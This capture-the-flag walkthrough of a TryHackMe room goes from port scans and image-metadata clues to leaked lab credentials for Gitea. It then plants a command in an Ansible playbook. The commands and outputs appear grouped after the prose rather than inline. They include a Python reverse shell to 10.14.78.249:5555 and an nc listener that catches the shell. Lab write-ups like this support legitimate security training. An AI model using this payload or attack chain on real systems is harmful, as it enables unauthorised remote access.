This writeup walks you through a room on TryHackMe created by tryhackme and gamercat
1 - Port Scan
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -p- -T5 10.10.208.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 12:37 EEST
Nmap scan report for 10.10.208.233
Host is up (0.11s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
222/tcp open rsh-spx
1337/tcp open waste
3000/tcp open ppp
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 273.46 seconds
1b - Versioning
2 - Lychee
2a - Landing page
http://TARGET_MACHINE_IP:80
Notables elements on this page:
There is a signin page accessible from the top left
There is mention of a software solution called Lychee
There is an album of cat photos!
Naturally, I explore the latter first :)
2b - The album
After clicking on the album in the landing page
Note the presence of an "about" button on the top right that gives info about the current album/image we are currently viewing
The first picture called timo-volz
Look closely at the description of the above picture: "note to self: strip metadata". Thus, we download the image and try to look for any metadata that remain embedded in the file:
The title of the photo is very interesting: ":8080/764efa883dda1e11db47671c4a3bbd9e.txt"
It seems like it is the port number and the path to another server on the target machine
3 - Nginx's TXT file
After we download the file from http://TARGET_MACHINE_URL:8080/764efa883dda1e11db47671c4a3bbd9e.txt, we can read the following:
The content of this txt file is self-explanatory, so let's get to it.
4 - Gitea
4a - About
From https://github.com/go-gitea/gitea: "Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD".
4b - Relevant public pages
http://TARGET_MACHINE_IP:3000 - Landing page
http://TARGET_MACHINE_IP:3000 - Signin page
4c - Logged in
After we use the credentials found in the TXT file from before:
http://TARGET_MACHINE_IP:3000 - Dashboard of logged in user
We can see in the image above that there is a repository called "ansible" that belongs to the user we hijacked.
http://TARGET_MACHINE_IP:3000/samarium/ansible - The ansible repo we control
And we got our first flag!
4d - Planting a reverse shell command
Now onto the YAML file, which seems promising:
We can see that this YAML file, which is probably used by an Ansible server hosted on port 1337, has a whoami command. Let us change that to reverse shell. After editing the file through the browser and committing changes, the file looks like this:
We now need to setup a handler on our Kali machine and then trigger Ansible to execute the reverse shell.
5 - Ansible
http://TARGET_MACHINE_IP:1337 - Landing page
We can see that Ansible is accessible to anyone without any authentication whatsoever. After firing up a handler on Kali, we click on "Run Ansible Playbook" and we get a reverse shell!
We now have a foothold in the target machine! And we also have our second flag:
From the URL mentioned above, we download the ZIP file on Kali. We extract "exploit_nss.py" which is all we need. We spin up an HTTP server on Kali so that the target machine can download the exploit. Then:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,222,1337,3000,8080 10.10.208.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 12:46 EEST
Nmap scan report for 10.10.208.233
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:f0:03:36:26:36:8c:2f:88:95:2c:ac:c3:bc:64:65 (RSA)
| 256 4f:f3:b3:f2:6e:03:91:b2:7c:c0:53:d5:d4:03:88:46 (ECDSA)
|_ 256 13:7c:47:8b:6f:f8:f4:6b:42:9a:f2:d5:3d:34:13:52 (ED25519)
80/tcp open http nginx 1.4.6 (Ubuntu)
|_http-title: Lychee
| http-robots.txt: 7 disallowed entries
|_/data/ /dist/ /docs/ /php/ /plugins/ /src/ /uploads/
| http-git:
| 10.10.208.233:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
| https://github.com/electerious/Lychee.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: nginx/1.4.6 (Ubuntu)
222/tcp open ssh OpenSSH 9.0 (protocol 2.0)
| ssh-hostkey:
| 256 be:cb:06:1f:33:0f:60:06:a0:5a:06:bf:06:53:33:c0 (ECDSA)
|_ 256 9f:07:98:92:6e:fd:2c:2d:b0:93:fa:fe:e8:95:0c:37 (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Content-Length: 3858
| Content-Type: text/html; charset=utf-8
| Date: Fri, 26 Apr 2024 09:46:43 GMT
| Last-Modified: Wed, 19 Oct 2022 15:30:49 GMT
| <!DOCTYPE html>
| <html>
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>OliveTin</title>
| <link rel = "stylesheet" type = "text/css" href = "style.css" />
| <link rel = "shortcut icon" type = "image/png" href = "OliveTinLogo.png" />
| <link rel = "apple-touch-icon" sizes="57x57" href="OliveTinLogo-57px.png" />
| <link rel = "apple-touch-icon" sizes="120x120" href="OliveTinLogo-120px.png" />
| <link rel = "apple-touch-icon" sizes="180x180" href="OliveTinLogo-180px.png" />
| </head>
| <body>
| <main title = "main content">
| <fieldset id = "section-switcher" title = "Sections">
| <button id = "showActions">Actions</button>
|_ <button id = "showLogs">Logs</but
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: no-store, no-transform
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: i_like_gitea=fd24884bf659a360; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=WXG19N_HmajaAX58RmXgHqYf7Ho6MTcxNDEyNDgwMzA0MDExNjQxNQ; Path=/; Expires=Sat, 27 Apr 2024 09:46:43 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 26 Apr 2024 09:46:43 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title> Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Cache-Control: no-store, no-transform
| Set-Cookie: i_like_gitea=46d94abaf511c8cd; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=SMFXgPnVJyNqe8wzrvzTDFw94Z86MTcxNDEyNDgwODY2NDAyNTA0OA; Path=/; Expires=Sat, 27 Apr 2024 09:46:48 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 26 Apr 2024 09:46:48 GMT
|_ Content-Length: 0
8080/tcp open http SimpleHTTPServer 0.6 (Python 3.6.9)
|_http-server-header: SimpleHTTP/0.6 Python/3.6.9
|_http-title: Welcome to nginx!
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1337-TCP:V=7.94SVN%I=7%D=4/26%Time=662B780F%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,FCC,"HTTP/1\.0\x20200\x20OK\r\nAccept-Range
SF:s:\x20bytes\r\nContent-Length:\x203858\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nDate:\x20Fri,\x2026\x20Apr\x202024\x2009:46:43\x20GM
SF:T\r\nLast-Modified:\x20Wed,\x2019\x20Oct\x202022\x2015:30:49\x20GMT\r\n
SF:\r\n<!DOCTYPE\x20html>\n\n<html>\n\t<head>\n\n\t\t<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\n\t\t
SF:<title>OliveTin</title>\n\t\t<link\x20rel\x20=\x20\"stylesheet\"\x20typ
SF:e\x20=\x20\"text/css\"\x20href\x20=\x20\"style\.css\"\x20/>\n\t\t<link\
SF:x20rel\x20=\x20\"shortcut\x20icon\"\x20type\x20=\x20\"image/png\"\x20hr
SF:ef\x20=\x20\"OliveTinLogo\.png\"\x20/>\n\n\t\t<link\x20rel\x20=\x20\"ap
SF:ple-touch-icon\"\x20sizes=\"57x57\"\x20href=\"OliveTinLogo-57px\.png\"\
SF:x20/>\n\t\t<link\x20rel\x20=\x20\"apple-touch-icon\"\x20sizes=\"120x120
SF:\"\x20href=\"OliveTinLogo-120px\.png\"\x20/>\n\t\t<link\x20rel\x20=\x20
SF:\"apple-touch-icon\"\x20sizes=\"180x180\"\x20href=\"OliveTinLogo-180px\
SF:.png\"\x20/>\n\t</head>\n\n\t<body>\n\t\t<main\x20title\x20=\x20\"main\
SF:x20content\">\n\t\t\t<fieldset\x20id\x20=\x20\"section-switcher\"\x20ti
SF:tle\x20=\x20\"Sections\">\n\t\t\t\t<button\x20id\x20=\x20\"showActions\
SF:">Actions</button>\n\t\t\t\t<button\x20id\x20=\x20\"showLogs\">Logs</bu
SF:t")%r(HTTPOptions,FCC,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x20byte
SF:s\r\nContent-Length:\x203858\r\nContent-Type:\x20text/html;\x20charset=
SF:utf-8\r\nDate:\x20Fri,\x2026\x20Apr\x202024\x2009:46:43\x20GMT\r\nLast-
SF:Modified:\x20Wed,\x2019\x20Oct\x202022\x2015:30:49\x20GMT\r\n\r\n<!DOCT
SF:YPE\x20html>\n\n<html>\n\t<head>\n\n\t\t<meta\x20name=\"viewport\"\x20c
SF:ontent=\"width=device-width,\x20initial-scale=1\.0\">\n\n\t\t<title>Oli
SF:veTin</title>\n\t\t<link\x20rel\x20=\x20\"stylesheet\"\x20type\x20=\x20
SF:\"text/css\"\x20href\x20=\x20\"style\.css\"\x20/>\n\t\t<link\x20rel\x20
SF:=\x20\"shortcut\x20icon\"\x20type\x20=\x20\"image/png\"\x20href\x20=\x2
SF:0\"OliveTinLogo\.png\"\x20/>\n\n\t\t<link\x20rel\x20=\x20\"apple-touch-
SF:icon\"\x20sizes=\"57x57\"\x20href=\"OliveTinLogo-57px\.png\"\x20/>\n\t\
SF:t<link\x20rel\x20=\x20\"apple-touch-icon\"\x20sizes=\"120x120\"\x20href
SF:=\"OliveTinLogo-120px\.png\"\x20/>\n\t\t<link\x20rel\x20=\x20\"apple-to
SF:uch-icon\"\x20sizes=\"180x180\"\x20href=\"OliveTinLogo-180px\.png\"\x20
SF:/>\n\t</head>\n\n\t<body>\n\t\t<main\x20title\x20=\x20\"main\x20content
SF:\">\n\t\t\t<fieldset\x20id\x20=\x20\"section-switcher\"\x20title\x20=\x
SF:20\"Sections\">\n\t\t\t\t<button\x20id\x20=\x20\"showActions\">Actions<
SF:/button>\n\t\t\t\t<button\x20id\x20=\x20\"showLogs\">Logs</but");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.94SVN%I=7%D=4/26%Time=662B780F%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20no-store,\x20no-transform\r\nContent-Type:\x20text/html;\x20char
SF:set=UTF-8\r\nSet-Cookie:\x20i_like_gitea=fd24884bf659a360;\x20Path=/;\x
SF:20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=WXG19N_HmajaAX58RmX
SF:gHqYf7Ho6MTcxNDEyNDgwMzA0MDExNjQxNQ;\x20Path=/;\x20Expires=Sat,\x2027\x
SF:20Apr\x202024\x2009:46:43\x20GMT;\x20HttpOnly;\x20SameSite=Lax\r\nSet-C
SF:ookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly;\x20Same
SF:Site=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x2026\x20Ap
SF:r\x202024\x2009:46:43\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\
SF:"en-US\"\x20class=\"theme-\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\
SF:t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial
SF:-scale=1\">\n\t<title>\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20te
SF:a</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:application/json;
SF:base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25h
SF:bWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDo
SF:vL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi")%r(Help,67,"HT
SF:TP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20cha
SF:rset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTT
SF:POptions,1C2,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nCache-Con
SF:trol:\x20no-store,\x20no-transform\r\nSet-Cookie:\x20i_like_gitea=46d94
SF:abaf511c8cd;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20
SF:_csrf=SMFXgPnVJyNqe8wzrvzTDFw94Z86MTcxNDEyNDgwODY2NDAyNTA0OA;\x20Path=/
SF:;\x20Expires=Sat,\x2027\x20Apr\x202024\x2009:46:48\x20GMT;\x20HttpOnly;
SF:\x20SameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Ag
SF:e=0;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\n
SF:Date:\x20Fri,\x2026\x20Apr\x202024\x2009:46:48\x20GMT\r\nContent-Length
SF::\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close
SF:\r\n\r\n400\x20Bad\x20Request");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.43 seconds
┌──(kali㉿kali)-[~]
└─$ exiftool Downloads/f5054e97620f168c7b5088c85ab1d6e4.jpg
ExifTool Version Number : 12.76
File Name : f5054e97620f168c7b5088c85ab1d6e4.jpg
Directory : Downloads
File Size : 7.4 MB
File Modification Date/Time : 2024:04:26 13:09:32+03:00
File Access Date/Time : 2024:04:26 13:09:34+03:00
File Inode Change Date/Time : 2024:04:26 13:09:32+03:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
XMP Toolkit : Image::ExifTool 12.49
Title : :8080/764efa883dda1e11db47671c4a3bbd9e.txt
Profile CMM Type : Little CMS
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2012:01:25 03:41:57
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : c2
Profile Copyright : IX
Media White Point : 0.9642 1 0.82491
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Image Width : 5189
Image Height : 7779
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 5189x7779
Megapixels : 40.4
note to self:
I setup an internal gitea instance to start using IaC for this server. It's at a quite basic state, but I'm putting the password here because I will definitely forget.
This file isn't easy to find anyway unless you have the correct url...
gitea: port 3000
user: samarium
password: TUmhyZ37CLZrhP
ansible runner (olivetin): port 1337
---
- name: Test
hosts: all # Define all the hosts
remote_user: bismuth
# Defining the Ansible task
tasks:
- name: get the username running the deploy
become: false
command: whoami
register: username_on_the_host
changed_when: false
- debug: var=username_on_the_host
- name: Test
shell: echo hi
---
- name: Test
hosts: all # Define all the hosts
remote_user: bismuth
# Defining the Ansible task
tasks:
- name: get the username running the deploy
become: false
command: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.78.249",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
register: username_on_the_host
changed_when: false
- debug: var=username_on_the_host
- name: Test
shell: echo hi
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.14.78.249] from (UNKNOWN) [10.10.208.233] 35608
bismuth@catpictures-ii:~$
